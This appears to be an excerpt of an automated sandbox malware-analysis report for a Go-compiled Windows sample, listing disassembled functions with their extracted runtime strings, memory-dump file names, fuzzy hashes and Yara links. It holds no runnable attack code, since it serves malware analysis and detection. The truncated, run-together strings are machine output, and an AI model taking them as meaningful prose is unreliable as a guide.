                                                                                • runtime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning booleantimeBegin/EndPeriod not foundtoo many open files in systemx509: cannot parse URI %q: %sx509: cannot parse dnsName %qx509: malformed serial numbe, xrefs: 00AD656E
                                                                                • runtime: root level max pages = runtime: setevent failed; errno=runtime: stack split at bad timeruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevscanstack: goroutine not stoppedslice bounds out of range [%x::]slic, xrefs: 00AD6526
                                                                                • root level max pages doesn't fit in summary : finalizer already set : first argument is nilruntime: casfrom_Gscanstatus bad oldval gp=runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramru, xrefs: 00AD65A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: +$root level max pages doesn't fit in summary : finalizer already set : first argument is nilruntime: casfrom_Gscanstatus bad oldval gp=runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramru$runtime: root level max pages = runtime: setevent failed; errno=runtime: stack split at bad timeruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevscanstack: goroutine not stoppedslice bounds out of range [%x::]slic$runtime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning booleantimeBegin/EndPeriod not foundtoo many open files in systemx509: cannot parse URI %q: %sx509: cannot parse dnsName %qx509: malformed serial numbe
                                                                                • API String ID: 0-1971791911
                                                                                • Opcode ID: 5247499f80652343d0158457bb47e5dfb5aa7aec6845c5ac8c6fdfea15a34c35
                                                                                • Instruction ID: 782f5877f7cc76e124954fb5fb251a3f54fcac6ea93698caef5858f1bc8991c1
                                                                                • Opcode Fuzzy Hash: 5247499f80652343d0158457bb47e5dfb5aa7aec6845c5ac8c6fdfea15a34c35
                                                                                • Instruction Fuzzy Hash: 84315EB49047418FC304EF75E29575E7BE1BF84344F50886DE8868B352EB75D84ACB52
                                                                                Function 00AD7B40 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • range partially overlaps resource length too longrunqsteal: runq overflowruntime: VirtualFree of runtime: found obj at *(runtime: markroot index runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs clea, xrefs: 00AD7C6C
                                                                                • runtime: addr = runtime: base = runtime: gp: gp=runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*timeBeginPeriod, xrefs: 00AD7B9A
                                                                                • , bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDispInvokeDnsQuery_WECDSA-SHA1Exception GC forcedGOMAXPROCSGetIfEntry, xrefs: 00AD7C38
                                                                                • , size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFreeMalayalamMemberRefMethodDefMethodPtrModuleRefMongolianMoveFileWNabataeanPalmyreneParseUin, xrefs: 00AD7BC4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: , bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDispInvokeDnsQuery_WECDSA-SHA1Exception GC forcedGOMAXPROCSGetIfEntry$, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFreeMalayalamMemberRefMethodDefMethodPtrModuleRefMongolianMoveFileWNabataeanPalmyreneParseUin$range partially overlaps resource length too longrunqsteal: runq overflowruntime: VirtualFree of runtime: found obj at *(runtime: markroot index runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs clea$runtime: addr = runtime: base = runtime: gp: gp=runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*timeBeginPeriod
                                                                                • API String ID: 0-3922939405
                                                                                • Opcode ID: 493cb7b39ace7a62084858490c2540d7d9e744c450789e8f0bbc9fd7c006eda9
                                                                                • Instruction ID: 8649060eb0aadd63797979c8571bcf959064116c4b8a0ece0fe8954dc3c6a280
                                                                                • Opcode Fuzzy Hash: 493cb7b39ace7a62084858490c2540d7d9e744c450789e8f0bbc9fd7c006eda9
                                                                                • Instruction Fuzzy Hash: D4310AB4909B458FC700EF65D29575EBBE1BF88308F80886EE48A4B352E7749849DB52
                                                                                Function 00AD795F Relevance: 5.1, Strings: 4, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • ), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT, xrefs: 00AD7A42
                                                                                • runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version, xrefs: 00AD7968
                                                                                • ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5, xrefs: 00AD7992
                                                                                • , ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTAS, xrefs: 00AD79EE, 00AD7A18
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT$, ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTAS$][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5$runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version
                                                                                • API String ID: 0-3450498712
                                                                                • Opcode ID: e76c5ad60e8ba504eb3a8b96d3777fec62db423d522212433ebdc4e79634df64
                                                                                • Instruction ID: 2169b84dc7826dd55c170bf07479b638c2cdeccac5a0c95b9420ac77fc69811e
                                                                                • Opcode Fuzzy Hash: e76c5ad60e8ba504eb3a8b96d3777fec62db423d522212433ebdc4e79634df64
                                                                                • Instruction Fuzzy Hash: 9331E6B8509B40CFC304EF65E28571EFBE4FF88748F50892EE88987312E77499449B52
                                                                                Function 00AC8D90 Relevance: 5.1, Strings: 4, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • scan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00AC8EA3
                                                                                • goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLe, xrefs: 00AC8E22
                                                                                • status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebruaryFieldPtrFieldRVAFullPathGeorgianGoSt, xrefs: 00AC8E4C
                                                                                • gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_Con, xrefs: 00AC8E76
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_Con$ goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLe$ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebruaryFieldPtrFieldRVAFullPathGeorgianGoSt$scan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory
                                                                                • API String ID: 0-120346602
                                                                                • Opcode ID: 01272842cbe83a2aa651545f7c4019752785842ceab35fd947e26a89c47af03a
                                                                                • Instruction ID: 2aa7166546d26878bd5049663a55678a437a007055983cd4a0c1e3b0f7a7521c
                                                                                • Opcode Fuzzy Hash: 01272842cbe83a2aa651545f7c4019752785842ceab35fd947e26a89c47af03a
                                                                                • Instruction Fuzzy Hash: CC31E7B4908B858FC304FF25D29575EBBE0BF85304F85886DE8D987352E7389948DB62
                                                                                Function 00AE7C80 Relevance: 5.1, Strings: 4, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebruaryFiel, xrefs: 00AE7D09
                                                                                • castogscanstatuscontext canceleddivision by zerogc: unswept spangcshrinkstackoffgetprotobynumberinteger overflowinvalid argumentinvalid encodinginvalid exchangeinvalid g statuslength too largemSpanList.insertmSpanList.removemessage too longmissing stackmapnewm, xrefs: 00AE7D3D
                                                                                • !, xrefs: 00AE7CE8
                                                                                • runtime: castogscanstatus oldval=runtime: failed mSpanList.insert runtime: failed to decommit pagesruntime: goroutine stack exceeds runtime: memory allocated by OS [runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of r, xrefs: 00AE7CDF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebruaryFiel$!$castogscanstatuscontext canceleddivision by zerogc: unswept spangcshrinkstackoffgetprotobynumberinteger overflowinvalid argumentinvalid encodinginvalid exchangeinvalid g statuslength too largemSpanList.insertmSpanList.removemessage too longmissing stackmapnewm$runtime: castogscanstatus oldval=runtime: failed mSpanList.insert runtime: failed to decommit pagesruntime: goroutine stack exceeds runtime: memory allocated by OS [runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of r
                                                                                • API String ID: 0-1438149499
                                                                                • Opcode ID: 70991eeca9402bbccaddda6045466f48dc60c8e1077969e779614331610019f7
                                                                                • Instruction ID: 12979118821c4b8ff60fcdde451a4720a6a3a6d97cd152d5403aa1390ed4a111
                                                                                • Opcode Fuzzy Hash: 70991eeca9402bbccaddda6045466f48dc60c8e1077969e779614331610019f7
                                                                                • Instruction Fuzzy Hash: DC1129B45087859FC300FF35D29576EBBE0EF84348F90885DE4C887252E77498498B52
                                                                                Function 00ADDEC0 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • runtime: netpoll: PostQueuedCompletionStatus failed (errno= abiRegArgsType needs GC Prog, update methodValueCallFrameObjsoffset parameter must be a multiple of the system's page sizex509: failed to parse URI constraint %q: cannot be IP addressx509: internal er, xrefs: 00ADDF4D
                                                                                • ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNS, xrefs: 00ADDF77
                                                                                • 3, xrefs: 00ADDF9B
                                                                                • runtime: netpoll: PostQueuedCompletionStatus failedx509: certificate has expired or is not yet valid: ConvertSecurityDescriptorToStringSecurityDescriptorWConvertStringSecurityDescriptorToSecurityDescriptorWFileAlignment larger than 0x200 and not a power of 2` , xrefs: 00ADDF92
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
